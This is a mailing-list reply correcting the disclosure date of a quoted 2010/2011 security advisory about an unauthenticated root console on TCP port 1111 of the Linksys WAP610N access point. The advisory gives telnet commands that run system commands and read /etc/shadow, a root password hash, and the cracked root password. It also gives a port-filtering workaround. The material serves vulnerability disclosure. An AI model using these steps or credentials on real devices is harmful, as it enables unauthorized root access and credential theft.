[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Linksys WAP610N Unauthenticated Root Console
The correct public disclosure date is 10/02/2011
In data Thursday 10 February 2011 00:12:10, Matteo Ignaccolo ha scritto:
> Secure Network - Security Research Advisory
> Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges
> Systems affected: WAP610N (Firmware Version: 1.0.01)
> Systems not affected: --
> Severity: High
> Local/Remote: Remote
> Vendor URL: http://www.linksysbycisco.com
> Author(s): Matteo Ignaccolo m.ignaccolo@xxxxxxxxxxxxxxxx
> Vendor disclosure: 14/06/2010
> Vendor acknowledged: 14/06/2010
> Vendor bugfix: 14/12/2010 (reply to our request for update)
> Vendor patch release: ??
> Public disclosure: 10/02/2010
> Advisory number: SN-2010-08
> Advisory URL:
> *** SUMMARY ***
> Linksys WAP610N is a SOHO wireless access point supporting 802.11n draft.
> Unauthenticated remote textual administration console has been found that
> allow an attacker to run system command as root user.
> *** VULNERABILITY DETAILS ***
> telnet <access-point IP> 1111
> Command> system id
> Output> uid=0(root) gid=0(root)
> Coomand> system cat /etc/shadow
> Ouptup> root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:99999:7:::
> Ouptup> bin:*:10933:0:99999:7:::
> Ouptup> daemon:*:10933:0:99999:7:::
> Ouptup> adm:*:10933:0:99999:7:::
> Ouptup> lp:*:10933:0:99999:7:::
> Ouptup> sync:*:10933:0:99999:7:::
> Ouptup> shutdown:*:10933:0:99999:7:::
> Ouptup> halt:*:10933:0:99999:7:::
> Ouptup> uucp:*:10933
> root password is "wlan" (cracked with MDcrack http://mdcrack.openwall.net)
> List of console's command:
> *** EXPLOIT ***
> Attackers may exploit these issues through a common telnet client as
> explained above.
> *** FIX INFORMATION ***
> No patch is available.
> *** WORKAROUNDS ***
> Put access points on separate wired network and filter network traffic
> to/from 1111 tcp port.
> *** LEGAL NOTICES ***
> Secure Network (www.securenetwork.it) is an information security company,
> which provides consulting and training services, and engages in security
> research and development.
> We are committed to open, full disclosure of vulnerabilities, cooperating
> whenever possible with software developers for properly handling
> This advisory is copyright 2009 Secure Network S.r.l. Permission is
> hereby granted for the redistribution of this alert, provided that it is
> not altered except by reformatting it, and that due credit is given. It
> may not be edited in any way without the express consent of Secure Network
> S.r.l. Permission is explicitly given for insertion in vulnerability
> databases and similars, provided that due credit is given to Secure
> The information in the advisory is believed to be accurate at the time of
> publishing based on currently available information. This information is
> provided as-is, as a free service to the community by Secure Network
> research staff. There are no warranties with regard to this information.
> Secure Network does not accept any liability for any direct, indirect,
> or consequential loss or damage arising from use of, or reliance on,
> this information.
> If you have any comments or inquiries, or any issue with what is reported
> in this advisory, please inform us as soon as possible.
> E-mail: securenetwork@xxxxxxxxxxxxxxxx
> GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
> Phone: +39 02 24 12 67 88
Dott. Ing. Matteo Ignaccolo
Secure Network S.r.l.
Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia
Tel: +39 02.24126788 Mobile: +39 335.1778376